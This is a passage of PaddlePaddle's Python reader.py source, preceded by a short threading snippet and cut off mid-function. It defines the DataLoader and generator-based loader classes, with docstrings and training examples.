time.sleep(1)
print('Done Sleeping..')
x = threading.Thread(target=func)
x.start()
print(threading.active_count())
time.sleep(1.2)
print("Finally")
print(threading.active_count())
|
reader.py
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from . import core
import sys
import six
import numpy as np
import threading
import paddle
from .framework import Program, Variable, program_guard, default_main_program, default_startup_program, in_dygraph_mode, cpu_places, _current_expected_place, _in_eager_mode
from .executor import global_scope
from .data_feeder import DataFeeder, BatchedTensorProvider
from .multiprocess_utils import multiprocess_queue_set, CleanupFuncRegistrar, _cleanup_mmap, _cleanup, _set_SIGCHLD_handler
from .dataloader import BatchSampler, Dataset, IterableDataset
from .dataloader.dataloader_iter import _DataLoaderIterSingleProcess, _DataLoaderIterMultiProcess, _DatasetKind, default_collate_fn
from .dataloader.batch_sampler import _InfiniteIterableSampler
from .layers.io import monkey_patch_reader_methods, _copy_reader_var_, double_buffer
from .unique_name import UniqueNameGenerator
from .framework import _get_paddle_place, _get_paddle_place_list
from paddle.fluid.framework import _set_expected_place, _current_expected_place
import logging
import warnings
### Dygraph DataLoader configs ###
import os
import multiprocessing
import signal
# NOTE: queue has a different name in python2 and python3
import queue
# NOTE: [ avoid hanging & fail quickly ] This value is used when getting data from another process
QUEUE_GET_TIMEOUT = 60
__all__ = ['PyReader', 'DataLoader', 'default_collate_fn']
data_loader_unique_name_generator = UniqueNameGenerator()
KEEP_DATA_LOADER_ORDER = True
USE_PINNED_MEMORY = None
def keep_data_loader_order(*args):
global KEEP_DATA_LOADER_ORDER
if len(args) == 0:
return KEEP_DATA_LOADER_ORDER
else:
assert len(args) == 1 and isinstance(args[0], bool)
KEEP_DATA_LOADER_ORDER = args[0]
def use_pinned_memory(*args):
global USE_PINNED_MEMORY
if len(args) == 0:
return USE_PINNED_MEMORY
else:
assert len(args) == 1 and isinstance(args[0], bool)
USE_PINNED_MEMORY = args[0]
def _convert_places(places):
if not isinstance(places, (list, tuple)):
places = [places]
ret = []
for p in places:
if not isinstance(p, core.Place):
tmp = core.Place()
tmp.set_place(p)
p = tmp
ret.append(p)
return ret
# NOTE(chenweihang): _reader_process_loop must be top level method to be pickled
def _reader_process_loop(batch_reader, data_queue):
try:
# set signal handler
core._set_process_signal_handler()
# NOTE: [ mmap files clear ] When the child process exits unexpectedly,
# some shared memory objects may have been applied for but have not yet
# been put into the inter-process Queue. This part of the object needs
# to be cleaned up when the process ends.
CleanupFuncRegistrar.register(_cleanup_mmap)
for batch in batch_reader():
tensor_list = core._convert_to_tensor_list(batch)
data_queue.put(tensor_list)
core._remove_tensor_list_mmap_fds(tensor_list)
data_queue.put(None)
except KeyboardInterrupt:
# NOTE: Main process will raise KeyboardInterrupt anyways, ignore it in child process
pass
except:
six.reraise(*sys.exc_info())
class DataLoaderBase(object):
def __init__(self):
self._places = None
def __call__(self):
return self
def next(self):
'''
Get the next item in the DataLoader object. This method
should not be called by users directly. It is used for
implementing iterator protocol of Python 2.x inside
PaddlePaddle framework.
'''
return self.__next__()
def __iter__(self):
raise NotImplementedError()
def __next__(self):
raise NotImplementedError()
@classmethod
def _check_input_array(cls, item):
arr = np.asarray(item)
if arr.dtype == object:  # np.object is removed in recent NumPy releases
raise TypeError(
"\n\tFaild to convert input data to a regular ndarray :\n\t* Usually "
"this means the input data contains nested lists with different lengths. "
"\n\t* Check the reader function passed to 'decorate_batch_generator'"
" to locate the data causes this issue.\n\t* Please consider using "
"'fluid.create_lod_tensor' to convert it to a LoD-Tensor.")
return arr
class DataLoader(object):
"""
DataLoader provides an iterator which iterates over the given dataset
once by the batch_sampler.
DataLoader supports single-process and multi-process data loading;
multi-process workers will be used to load data asynchronously if
:attr:`num_workers` is set as a positive number.
DataLoader supports map-style datasets and iterable-style datasets.
For a map-style dataset (one that can get a sample from the dataset with a given
index), please see :code:`paddle.io.Dataset`.
For an iterable-style dataset (one that gets samples from the dataset iteratively,
like a Python iterator), please see :code:`paddle.io.IterableDataset`.
For :code:`batch_sampler` please see :code:`paddle.io.BatchSampler`
.. note::
GPU tensor operations are not supported in subprocesses currently;
please don't use GPU tensor operations in any pipeline stage that will
be performed in a subprocess, such as dataset transforms, collate_fn,
etc. NumPy array and CPU tensor operations are supported.
**Disable automatic batching**
In certain cases, such as some NLP tasks, users need to handle batching
manually inside the dataset instead of relying on automatic batching. For
these cases, automatic batching is disabled if both :attr:`batch_size` and
:attr:`batch_sampler` are set to None; each item got from :attr:`dataset`
should then already be batched data, and it will be processed by the function
defined by :attr:`collate_fn` or :attr:`default_collate_fn` (a minimal sketch
follows the note below).
.. note::
When automatic batching is disabled, :attr:`default_collate_fn` will
do nothing to data from dataset.
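A minimal sketch of disabling automatic batching (the random pre-batched
dataset below is illustrative only, not part of this module):

.. code-block:: python

    import numpy as np
    from paddle.io import Dataset, DataLoader

    class PreBatchedDataset(Dataset):
        # every sample returned here is already a complete batch
        def __getitem__(self, idx):
            return np.random.random([16, 784]).astype('float32')

        def __len__(self):
            return 8

    # batch_size=None and batch_sampler=None disable automatic batching,
    # so default_collate_fn leaves the pre-batched samples untouched
    loader = DataLoader(PreBatchedDataset(),
                        batch_size=None,
                        batch_sampler=None,
                        num_workers=0)
    for batch in loader():
        pass  # each element corresponds to one pre-batched sample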
Args:
dataset(Dataset): the dataset to load data from, should be an
instance of subclass of :code:`paddle.io.Dataset` or
:code:`paddle.io.IterableDataset`.
feed_list (list(Tensor)|tuple(Tensor)): feed Tensor list.
The Tensors should be created by :code:`paddle.static.data()`.
:attr:`feed_list` must be set if :attr:`return_list` is
False. Default None.
places(list(Place)|tuple(Place)|list(str)|optional): a list of Place,
to put data onto, :attr:`places` can be None, if
:attr:`places` is None, default place(CPUPlace or CUDAPlace(0))
will be used. Default None. If ``places`` is list of string,
the string in the list can be ``cpu``, ``gpu:x`` and ``gpu_pinned``,
where ``x`` is the index of the GPUs.
return_list (bool): whether the return value on each device is
presented as a list. If :attr:`return_list=False`, the return
value on each device would be a dict of str -> Tensor, where
the key of the dict is the name of each fed Tensors. If
:attr:`return_list=True`, the return value on each device would
be a list(Tensor). :attr:`return_list` can only be True
in dynamic graph mode. Default True.
batch_sampler(BatchSampler): an instance of `paddle.io.BatchSampler`
to generate batch indices to draw samples from :attr:`dataset`
and combine a batch. Default None.
batch_size(int|None): sample number in a mini-batch, a substitution
parameter for :attr:`batch_sampler`, if :attr:`batch_sampler`
is not set, a default `paddle.io.BatchSampler` will be used
and initialize by :attr:`batch_size`, :attr:`shuffle` and
:attr:`drop_last`. Default 1.
shuffle(bool): whether to shuffle the indices order before generating
batch indices, a substitution parameter for :attr:`batch_sampler`
see :attr:`batch_size`. Default False.
drop_last(bool): whether to drop the last incomplete batch when the dataset size
is not divisible by the batch size, a substitution parameter
for :attr:`batch_sampler`, see :attr:`batch_size`. Default False
collate_fn(callable): function to generate mini-batch data by merging
the sample list, None for only stacking each field of the samples in axis
0 (same as :attr:`np.stack(..., axis=0)`). Default None
num_workers(int): the number of subprocess to load data, 0 for no
subprocess used and loading data in main process. Default 0
use_buffer_reader (bool): whether to use a buffered reader.
If use_buffer_reader=True, the DataLoader would prefetch next
batch data asynchronously, so it would speed up data feeding
and occupies a little more CPU or GPU memory, i.e., the memory
of one batch input data. Default True.
use_shared_memory (bool): whether to use shared memory to speed up
putting data into inter-process queue, set :attr:`use_shared_memory`
as True only when the shared memory space on your machine (e.g.
the space of '/dev/shm' on a Linux operating system) is large enough.
Shared memory will only be enabled in multi-process mode(num_workers
> 0). Default True.
timeout(int): the timeout value for getting data from the output queue
of subprocesses. Default 0.
worker_init_fn(callable): init function which will be called with
worker id on each subprocess start if not set as None. Default
None.
Returns:
DataLoader: an iterable object for data iterating, each element of the generated data is a Tensor.
Examples:
.. code-block:: python
import numpy as np
import paddle
import paddle.nn as nn
import paddle.nn.functional as F
from paddle.io import Dataset, BatchSampler, DataLoader
BATCH_NUM = 20
BATCH_SIZE = 16
EPOCH_NUM = 4
IMAGE_SIZE = 784
CLASS_NUM = 10
# define a random dataset
class RandomDataset(Dataset):
def __init__(self, num_samples):
self.num_samples = num_samples
def __getitem__(self, idx):
image = np.random.random([IMAGE_SIZE]).astype('float32')
label = np.random.randint(0, CLASS_NUM - 1, (1, )).astype('int64')
return image, label
def __len__(self):
return self.num_samples
dataset = RandomDataset(BATCH_NUM * BATCH_SIZE)
class SimpleNet(nn.Layer):
def __init__(self):
super(SimpleNet, self).__init__()
self.fc = nn.Linear(IMAGE_SIZE, CLASS_NUM)
def forward(self, image, label=None):
return self.fc(image)
simple_net = SimpleNet()
opt = paddle.optimizer.SGD(learning_rate=1e-3,
parameters=simple_net.parameters())
loader = DataLoader(dataset,
batch_size=BATCH_SIZE,
shuffle=True,
drop_last=True,
num_workers=2)
for e in range(EPOCH_NUM):
for i, (image, label) in enumerate(loader()):
out = simple_net(image)
loss = F.cross_entropy(out, label)
avg_loss = paddle.mean(loss)
avg_loss.backward()
opt.minimize(avg_loss)
simple_net.clear_gradients()
print("Epoch {} batch {}: loss = {}".format(e, i, np.mean(loss.numpy())))
.. note::
For reading iterable dataset with multiprocess Dataloader,
please see :code:`paddle.io.IterableDataset`
"""
def __init__(self,
dataset,
feed_list=None,
places=None,
return_list=True,
batch_sampler=None,
batch_size=1,
shuffle=False,
drop_last=False,
collate_fn=None,
num_workers=0,
use_buffer_reader=True,
use_shared_memory=True,
timeout=0,
worker_init_fn=None,
persistent_workers=False):
self.return_list = return_list
self.collate_fn = collate_fn
self.use_buffer_reader = use_buffer_reader
self.worker_init_fn = worker_init_fn
assert isinstance(dataset, Dataset), \
"dataset should be subclass instance of paddle.io.Dataset"
self.dataset = dataset
if not return_list and not in_dygraph_mode():
assert feed_list is not None, \
"feed_list should be set when return_list=False"
self.feed_list = feed_list
if places is None:
places = _current_expected_place()
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
self.places = _convert_places(places)
assert num_workers >= 0, "num_workers should be a non-negative value"
if num_workers > 0 and (sys.platform == 'darwin' or
sys.platform == 'win32'):
warnings.warn(
"DataLoader with multi-process mode is not supported on MacOs and Windows currently." \
" Please use signle-process mode with num_workers = 0 instead")
num_workers = 0
self.num_workers = num_workers
self.use_shared_memory = use_shared_memory
if use_shared_memory and num_workers == 0:
self.use_shared_memory = False
assert timeout >= 0, "timeout should be a non-negative value"
self.timeout = timeout
if isinstance(dataset, IterableDataset):
self.dataset_kind = _DatasetKind.ITER
if shuffle:
raise ValueError(
"IterableDataset not support shuffle, but got shuffle={}".
format(shuffle))
if batch_sampler is not None:
raise ValueError(
"IterableDataset expect unspecified batch_sampler")
else:
self.dataset_kind = _DatasetKind.MAP
if batch_sampler is not None:
assert batch_size == 1 and not shuffle and not drop_last, \
"batch_size/shuffle/drop_last should not be set when " \
"batch_sampler is given"
self.batch_sampler = batch_sampler
self.batch_size = None
elif batch_size is None:
self.batch_sampler = None
self.batch_size = None
else:
assert batch_size > 0, \
"batch_size should be None or a positive value when " \
"batch_sampler is not given"
self.batch_size = batch_size
if isinstance(dataset, IterableDataset):
self.batch_sampler = _InfiniteIterableSampler(dataset,
batch_size)
else:
self.batch_sampler = BatchSampler(
dataset=dataset,
batch_size=batch_size,
shuffle=shuffle,
drop_last=drop_last)
self.drop_last = drop_last
self.auto_collate_batch = self.batch_sampler is not None
self.pin_memory = False
if in_dygraph_mode():
self.pin_memory = True if use_pinned_memory(
) is None else use_pinned_memory()
self._persistent_workers = persistent_workers
self._iterator = None
def __len__(self):
if self.dataset_kind == _DatasetKind.ITER:
raise ValueError("length of IterableDataset not supported")
else:
if self.auto_collate_batch:
return len(self.batch_sampler)
else:
return len(self.dataset)
def __iter__(self):
if self.num_workers == 0:
return _DataLoaderIterSingleProcess(self)
elif self._persistent_workers:
if self._iterator is None:
self._iterator = _DataLoaderIterMultiProcess(self)
else:
self._iterator._reset()
return self._iterator
else:
return _DataLoaderIterMultiProcess(self)
def __call__(self):
return self.__iter__()
@staticmethod
def from_generator(feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False,
use_multiprocess=False,
drop_last=True):
"""
.. warning::
This API will be deprecated in the future, it is recommended to use
:code:`paddle.io.DataLoader` which supports multi-process acceleration.
.. note::
**The framework ensures that the data loading order of DataLoader is exactly the same as the user-defined data source.**
Create a DataLoader object for loading data from Python generator.
Data would be prefetched using Python thread and be pushed
into a queue asynchronously.
The created DataLoader object provides 3 methods to set the data source
:code:`set_sample_generator` , :code:`set_sample_list_generator` and
:code:`set_batch_generator` . Please see the following example codes
to know their usages.
If iterable = True, the created DataLoader object is a Python generator
object, which is iterable using for-range loop.
If iterable = False, the created DataLoader object provides
:code:`start()` and :code:`reset()` method to control the data reading
process.
Args:
feed_list (list(Tensor)|tuple(Tensor)): feed Tensor list.
The Tensors should be created by :code:`fluid.data()`.
capacity (int): capacity of the queue maintained in DataLoader.
The unit is batch number. Set larger capacity if your reader
is fast.
use_double_buffer (bool): whether to use double_buffer_reader.
If use_double_buffer=True, the DataLoader would prefetch next
batch data asynchronously, so it would speed up data feeding
and occupies a little more CPU or GPU memory, i.e., the memory
of one batch input data.
iterable (bool): whether the created DataLoader is iterable.
return_list (bool): whether the return value on each device is
presented as a list. It is only valid when iterable=True.
If return_list=False, the return value on each device would
be a dict of str -> LoDTensor, where the key of the dict is
the name of each fed Tensors. If return_list=True, the
return value on each device would be a list(LoDTensor). It is
recommended to use return_list=False in static graph mode and
use return_list=True in dygraph mode.
use_multiprocess (bool): whether to use multi-process to speed up
the data loading process in dygraph. Note: this parameter only
can be used in the dygraph mode. In the static graph mode,
whether this parameter is set or not has no effect.
The Default value is False.
drop_last (bool): whether to drop the last batches whose number is
less than the CPU core/GPU card number. The default value is
True. In training phase, users should not set drop_last=False,
because all CPU cores/GPU cards must read data from DataLoader.
In inference phase, users can set drop_last=False, so that the
last batches whose number is less than the CPU core/GPU card
number can be tested.
Returns:
loader (DataLoader): the created DataLoader object.
Examples 1:
.. code-block:: python
'''
Example in static graph mode
'''
import numpy as np
import paddle
import paddle.static as static
import paddle.nn.functional as F
BATCH_NUM = 10
BATCH_SIZE = 16
EPOCH_NUM = 4
CLASS_NUM = 10
ITERABLE = True # whether the created DataLoader object is iterable
USE_GPU = False # whether to use GPU
DATA_FORMAT = 'batch_generator' # data format of data source user provides
paddle.enable_static()
def simple_net(image, label):
fc_tmp = static.nn.fc(image, size=CLASS_NUM)
cross_entropy = F.softmax_with_cross_entropy(fc_tmp, label)  # use the fc logits, not the raw image
loss = paddle.mean(cross_entropy)
sgd = paddle.optimizer.SGD(learning_rate=1e-3)
sgd.minimize(loss)
return loss
def get_random_images_and_labels(image_shape, label_shape):
image = np.random.random(size=image_shape).astype('float32')
label = np.random.random(size=label_shape).astype('int64')
return image, label
# If the data generator yields one sample each time,
# use DataLoader.set_sample_generator to set the data source.
def sample_generator_creator():
def __reader__():
for _ in range(BATCH_NUM * BATCH_SIZE):
image, label = get_random_images_and_labels([784], [1])
yield image, label
return __reader__
# If the data generator yield list of samples each time,
# use DataLoader.set_sample_list_generator to set the data source.
def sample_list_generator_creator():
def __reader__():
for _ in range(BATCH_NUM):
sample_list = []
for _ in range(BATCH_SIZE):
image, label = get_random_images_and_labels([784], [1])
sample_list.append([image, label])
yield sample_list
return __reader__
# If the data generator yields a batch each time,
# use DataLoader.set_batch_generator to set the data source.
def batch_generator_creator():
def __reader__():
for _ in range(BATCH_NUM):
batch_image, batch_label = get_random_images_and_labels([BATCH_SIZE, 784], [BATCH_SIZE, 1])
yield batch_image, batch_label
return __reader__
# If DataLoader is iterable, use for loop to train the network
def train_iterable(exe, prog, loss, loader):
for _ in range(EPOCH_NUM):
for data in loader():
exe.run(prog, feed=data, fetch_list=[loss])
# If DataLoader is not iterable, use start() and reset() method to control the process
def train_non_iterable(exe, prog, loss, loader):
for _ in range(EPOCH_NUM):
loader.start() # call DataLoader.start() before each epoch starts
try:
while True:
exe.run(prog, fetch_list=[loss])
except paddle.core.EOFException:
loader.reset() # call DataLoader.reset() after catching EOFException
def set_data_source(loader, places):
if DATA_FORMAT == 'sample_generator':
loader.set_sample_generator(sample_generator_creator(), batch_size=BATCH_SIZE, drop_last=True, places=places)
elif DATA_FORMAT == 'sample_list_generator':
loader.set_sample_list_generator(sample_list_generator_creator(), places=places)
elif DATA_FORMAT == 'batch_generator':
loader.set_batch_generator(batch_generator_creator(), places=places)
else:
raise ValueError('Unsupported data format')
image = static.data(name='image', shape=[None, 784], dtype='float32')
label = static.data(name='label', shape=[None, 1], dtype='int64')
# Define DataLoader
loader = paddle.io.DataLoader.from_generator(feed_list=[image, label], capacity=16, iterable=ITERABLE)
# Define network
loss = simple_net(image, label)
# Set data source of DataLoader
#
# If DataLoader is iterable, places must be given and the number of places must be the same as the device number.
# - If you are using GPU, call `paddle.static.cuda_places()` to get all GPU places.
# - If you are using CPU, call `paddle.static.cpu_places()` to get all CPU places.
#
# If DataLoader is not iterable, places can be None.
places = static.cuda_places() if USE_GPU else static.cpu_places()
set_data_source(loader, places)
exe = static.Executor(places[0])
exe.run(static.default_startup_program())
prog = static.CompiledProgram(static.default_main_program()).with_data_parallel(loss_name=loss.name)
if loader.iterable:
train_iterable(exe, prog, loss, loader)
else:
train_non_iterable(exe, prog, loss, loader)
Examples 2:
.. code-block:: python
'''
Example in dynamic graph mode.
'''
import numpy as np
import paddle
import paddle.nn as nn
import paddle.optimizer as opt
import paddle.distributed as dist
BATCH_SIZE = 16
BATCH_NUM = 4
EPOCH_NUM = 4
IMAGE_SIZE = 784
CLASS_NUM = 10
USE_GPU = False # whether to use GPU
def _get_random_images_and_labels(image_shape, label_shape):
image = np.random.random(size=image_shape).astype('float32')
label = np.random.random(size=label_shape).astype('int64')
return image, label
def __reader__():
for _ in range(BATCH_NUM):
batch_image, batch_label = _get_random_images_and_labels(
[BATCH_SIZE, IMAGE_SIZE], [BATCH_SIZE, CLASS_NUM])
yield batch_image, batch_label
def random_batch_reader():
return __reader__
class LinearNet(nn.Layer):
def __init__(self):
super(LinearNet, self).__init__()
self._linear = nn.Linear(IMAGE_SIZE, CLASS_NUM)
@paddle.jit.to_static
def forward(self, x):
return self._linear(x)
# set device
paddle.set_device('gpu' if USE_GPU else 'cpu')
# create network
layer = LinearNet()
dp_layer = paddle.DataParallel(layer)
loss_fn = nn.CrossEntropyLoss()
adam = opt.Adam(learning_rate=0.001, parameters=dp_layer.parameters())
# create data loader
loader = paddle.io.DataLoader.from_generator(capacity=5)
loader.set_batch_generator(random_batch_reader())
for epoch_id in range(EPOCH_NUM):
for batch_id, (image, label) in enumerate(loader()):
out = layer(image)
loss = loss_fn(out, label)
loss.backward()
adam.step()
adam.clear_grad()
print("Epoch {} batch {}: loss = {}".format(
epoch_id, batch_id, np.mean(loss.numpy())))
Examples 3:
.. code-block:: python
'''
Example of using `drop_last` in static graph multi-card mode
'''
import paddle
import paddle.static as static
import numpy as np
import os
# We use 2 CPU cores to run inference network
os.environ['CPU_NUM'] = '2'
paddle.enable_static()
# The data source has only 3 batches, which cannot be
# divided evenly across the CPU cores
def batch_generator():
for i in range(3):
yield np.array([i+1]).astype('float32'),
x = static.data(name='x', shape=[None], dtype='float32')
y = x * x
def run_inference(drop_last):
loader = paddle.io.DataLoader.from_generator(feed_list=[x],
capacity=8, drop_last=drop_last)
loader.set_batch_generator(batch_generator, static.cpu_places())
exe = static.Executor(paddle.CPUPlace())
prog = static.CompiledProgram(static.default_main_program())
prog = prog.with_data_parallel()
result = []
for data in loader():
each_ret, = exe.run(prog, feed=data, fetch_list=[y])
result.extend(each_ret)
return result
# Set drop_last to True, so that the last batch whose
# number is less than CPU core number would be discarded.
print(run_inference(drop_last=True)) # [1.0, 4.0]
# Set drop_last to False, so that the last batch whose
# number is less than CPU core number can be tested.
print(run_inference(drop_last=False)) # [1.0, 4.0, 9.0]
"""
if in_dygraph_mode():
return DygraphGeneratorLoader(feed_list, capacity,
use_double_buffer, iterable,
return_list, use_multiprocess)
else:
return GeneratorLoader(feed_list, capacity, use_double_buffer,
iterable, return_list, drop_last)
@staticmethod
def from_dataset(dataset, places, drop_last=True):
"""
.. warning::
This API will be deprecated in the future; it is recommended to use
:code:`paddle.io.DataLoader`, which supports multi-process acceleration.
Create an iterable DataLoader object for loading data from Dataset.
Dataset is currently only supported on Linux.
Args:
dataset (InMemoryDataset|QueueDataset): the dataset object.
places (list(CUDAPlace)|list(CPUPlace)|list(str)): places to which the result
data should be converted. If places is a list of strings, each string
can be ``cpu``, ``gpu:x`` or ``gpu_pinned``, where x is the index of the GPU.
drop_last (bool): whether to drop the last batch whose sample
count is less than the batch size. If drop_last = True, it is
dropped; if drop_last = False, it is kept.
Returns:
loader (DataLoader): the created DataLoader object, which can be
treated as a Python generator.
Examples:
.. code-block:: python
import paddle
import paddle.static as static
paddle.enable_static()
image = static.data(name='image', shape=[None, 784], dtype='float32')
label = static.data(name='label', shape=[None, 1], dtype='int64')
dataset = paddle.distributed.QueueDataset()
dataset.init(
batch_size=32,
pipe_command='cat',
use_var=[image, label])
dataset.set_filelist(['a.txt', 'b.txt', 'c.txt'])
loader = paddle.io.DataLoader.from_dataset(dataset, static.cpu_places())
"""
return DatasetLoader(dataset, places, drop_last)
class DygraphGeneratorLoader(DataLoaderBase):
"""
The GeneratorLoader used in dygraph mode.
Most functions of the multiprocess dygraph GeneratorLoader differ from the
static graph GeneratorLoader, so it is implemented separately to keep the code readable.
"""
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=True,
use_multiprocess=False):
self._batch_reader = None
self._places = None
self._feed_list = feed_list
if not capacity:
raise ValueError("Please give value to capacity.")
self._capacity = capacity
self._use_double_buffer = use_double_buffer
if not iterable:
warnings.warn(
"Please NOTE: DygraphGeneratorLoader supports iterable mode only. Change to iterable mode."
)
self._iterable = True
if not return_list:
warnings.warn(
"Please NOTE: DygraphGeneratorLoader supports returning as list only. Change to return as list."
)
self._return_list = True
# NOTE: multiprocessing behaves differently across platforms; we will address this later
self._use_multiprocess = use_multiprocess
if self._use_multiprocess and (sys.platform == 'darwin' or
sys.platform == 'win32'):
warnings.warn(
"NOTE: DygraphGeneratorLoader with multiprocess mode is not currently supported on MacOs and Windows."
)
self._use_multiprocess = False
if self._use_multiprocess:
# NOTE: the multiprocessing.Queue used to save loading data in self._process
self._data_queue = None
# NOTE: this process is used to load data asynchronously from self._batch_reader
self._process = None
# NOTE: the C++ LoDTensorBlockingQueue instance
self._blocking_queue = None
# NOTE: 1. In multiprocess mode, this thread is used to get next batch data from
# self._data_queue, then push it into self._blocking_queue; 2. In singleprocess
# mode, this thread is used to get next batch data from self._batch_reader, then
# push it into self._blocking_queue
self._thread = None
self._pin_memory = True if use_pinned_memory(
) is None else use_pinned_memory()
@property
def queue(self):
return self._blocking_queue
@property
def iterable(self):
return self._iterable
def _clear_and_remove_data_queue(self):
if self._data_queue is not None:
while True:
try:
self._data_queue.get_nowait()
except queue.Empty:
break
global multiprocess_queue_set
multiprocess_queue_set.remove(self._data_queue)
def _wait_thread_ends(self):
thread = self._thread
if thread is not None:
self._blocking_queue.close()
thread.join()
def _wait_process_ends(self):
process = self._process
if process is not None:
process.join()
# erase process id
core._erase_process_pids(id(self))
def _init_iterable(self):
self._wait_thread_ends()
if self._use_multiprocess:
self._wait_process_ends()
self._var_names = []
self._shapes = []
self._dtypes = []
self._need_check_feed = []
self._blocking_queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._capacity, False)
self._reader = None
self._reader = core.create_py_reader(
self.queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_double_buffer, True,
self._pin_memory)
def _start(self):
if self._use_multiprocess:
# clear old _data_queue and remove it from multiprocess_queue_set
self._clear_and_remove_data_queue()
# set data_queue and process
self._data_queue = multiprocessing.Queue(self._capacity)
# add _data_queue into global queue set
global multiprocess_queue_set
multiprocess_queue_set.add(self._data_queue)
self._process = multiprocessing.Process(
target=_reader_process_loop,
args=(self._batch_reader, self._data_queue))
self._process.daemon = True
self._process.start()
# Set child process signal handler
# NOTE: [ avoiding hang ] 1. if the child process dies due to a bus error/segfault
# or simply hangs, the main process will hang waiting for data, so we need to handle
# SIGSEGV and SIGBUS of the child process here; 2. if the main process ends before the
# child process, it shuts all its daemonic children down with a SIGTERM (instead of
# joining them without a timeout), so we also need to handle SIGTERM here.
core._set_process_pids(id(self), [self._process.pid])
_set_SIGCHLD_handler()
# Set reader_thread
self._thread_done_event = threading.Event()
self._thread = threading.Thread(
target=self._reader_thread_loop_for_multiprocess,
args=(_current_expected_place(), ))
self._thread.daemon = True
self._thread.start()
else:
self._thread = threading.Thread(
target=self._reader_thread_loop_for_singleprocess,
args=(_current_expected_place(), ))
self._thread.daemon = True
self._thread.start()
def _reset(self):
self._reader.reset()
self._wait_thread_ends()
if self._use_multiprocess:
self._wait_process_ends()
def __iter__(self):
assert self.iterable, "DataLoader is not iterable"
assert self._batch_reader is not None, \
"Data source of DataLoader has not set yet"
self._init_iterable()
self._start()
return self
def __next__(self):
try:
if _in_eager_mode():
return core.eager.read_next_tensor_list(
self._reader.read_next_list()[0])
else:
return self._reader.read_next_var_list()
except StopIteration:
self._reset()
six.reraise(*sys.exc_info())
def _exit_thread_expectedly(self):
self._thread_done_event.set()
self._blocking_queue.close()
def _exit_thread_unexpectedly(self):
self._thread_done_event.set()
self._blocking_queue.kill()
logging.error("DataLoader reader thread raised an exception!")
def _reader_thread_loop_for_multiprocess(self, legacy_expected_place):
# See _DataLoaderIterSingleProcess._thread_loop() for why set expected place here.
_set_expected_place(legacy_expected_place)
while not self._thread_done_event.is_set():
try:
# NOTE: [ avoid hanging ] Even with carefully designed data dependencies
# (i.e., a put() always corresponding to a get()), hanging on get() can
# still happen when data in queue is corrupted (e.g., due to
# Queue.cancel_join_thread or unexpected exit). So we set a timeout whenever
# we try to get data from `data_queue`
# NOTE: [ avoid failing quickly ] Here, the QUEUE_GET_TIMEOUT setting
# is relatively long, currently 60 seconds, because in some models,
# if the reader child process starts with a heavy burden, it does not
# have enough time to put data into the queue before the main process
# starts trying to get data from the queue. In that case, the child thread
# needs to wait slightly longer.
tensor_list = self._data_queue.get(timeout=QUEUE_GET_TIMEOUT)
except:
# NOTE: [ avoid hanging ] After adding the shared memory mechanism, not only
# queue.Empty but also other exceptions (such as mmap failures) can
# occur here. If they are not handled, the loader will hang.
self._exit_thread_unexpectedly()
logging.error(
"DataLoader reader thread failed to read data from the multiprocessing.Queue."
)
six.reraise(*sys.exc_info())
if not self._thread_done_event.is_set():
if tensor_list is not None:
try:
array = core.LoDTensorArray()
for tensor in tensor_list:
array.append(tensor)
if not self._blocking_queue.push(array):
self._blocking_queue.close()
except:
self._exit_thread_unexpectedly()
six.reraise(*sys.exc_info())
else:
self._exit_thread_expectedly()
def _reader_thread_loop_for_singleprocess(self, legacy_expected_place):
try:
# See _DataLoaderIterSingleProcess._thread_loop() for why set expected place here.
_set_expected_place(legacy_expected_place)
for sample in self._batch_reader():
array = core.LoDTensorArray()
for item in sample:
if not isinstance(item, core.LoDTensor):
item = self._check_input_array(item)
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if not self._blocking_queue.push(array):
break
self._blocking_queue.close()
self._thread = None
except Exception:
self._blocking_queue.kill()
self._thread = None
logging.warning(
"DygraphDataLoader reader thread raised an exception.")
six.reraise(*sys.exc_info())
def set_sample_generator(self,
reader,
batch_size,
drop_last=True,
places=None):
assert batch_size > 0, "batch_size must be larger than 0"
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
self.set_sample_list_generator(
paddle.batch(
reader, batch_size=batch_size, drop_last=drop_last),
places=places)
return self
def set_sample_list_generator(self, reader, places=None):
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
def __batch_reader_impl__():
for batch in reader():
slots = []
for items in batch:
for i, item in enumerate(items):
if len(slots) < len(items):
slots.append([item])
else:
slots[i].append(item)
yield slots
self.set_batch_generator(__batch_reader_impl__, places)
return self
def set_batch_generator(self, reader, places=None):
if isinstance(places, (list, tuple)):
places = _get_paddle_place_list(places)
else:
places = _get_paddle_place(places)
self._batch_reader = reader
if places is None:
places = _current_expected_place()
self._places = _convert_places(places)
assert len(self._places) == 1, \
"Number of places must be 1 in imperative mode"
return self
class GeneratorLoader(DataLoaderBase):
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False,
drop_last=True):
self._tensor_reader = None
self._places = None
self._thread = None
self._queue = None
self._feed_list = feed_list
self._exited = False
self._drop_last = drop_last
self._keep_order = keep_data_loader_order()
if not capacity:
raise ValueError("Please give value to capacity.")
self._iterable = iterable
self._return_list = return_list
if not self._feed_list:
raise Exception("Feed list must be given under static mode.")
self._use_double_buffer = use_double_buffer
self._capacity = capacity
if not self._iterable:
self._init_non_iterable()
def _wait_thread_ends(self):
# Get self._thread first to prevent data race, because __thread_main__
# would set self._thread to None at the end
thread = self._thread
if thread is not None and self._iterable:
self._queue.close()
thread.join()
def _init_iterable(self):
self._wait_thread_ends()
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
